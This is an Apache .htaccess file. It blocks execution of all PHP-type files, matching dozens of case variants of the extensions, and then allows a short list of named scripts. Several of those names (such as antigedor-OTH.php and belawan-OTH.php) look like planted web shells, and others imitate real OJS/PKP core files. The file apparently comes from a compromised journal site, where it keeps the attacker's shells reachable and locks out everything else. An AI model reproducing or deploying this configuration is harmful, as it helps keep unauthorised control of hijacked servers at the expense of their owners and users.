Options -Indexes

<FilesMatch "\.(?:php|pHp|pht|phtml|phtm|php5|php72|phar|pgif|inc|sht|shtm|shtml|PHP|Php|PhP|PHp|pHP|phP|PHTML|Phtml|PHtml|PhTml|PhtMl|PhtmL|pHtml|pHTml|pHtMl|pHtmL|phTml|phTMl|phTmL|phtMl|phtML|PHT|Pht|PHt|PhT|pHt|pHT)$">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(config.stylesss.php|antigedor-OTH.php|belawan-OTH.php|bootstrap.inc.php|functions.inc.php|vocabs.php|PKPApplication.inc.php|PKPInstall.php|DOISettingsHandler.inc.php|AssignToIssueInstaller.inc.php|AppearanceHandlerForm.inc.php)$">
Order allow,deny
Allow from all
</FilesMatch>
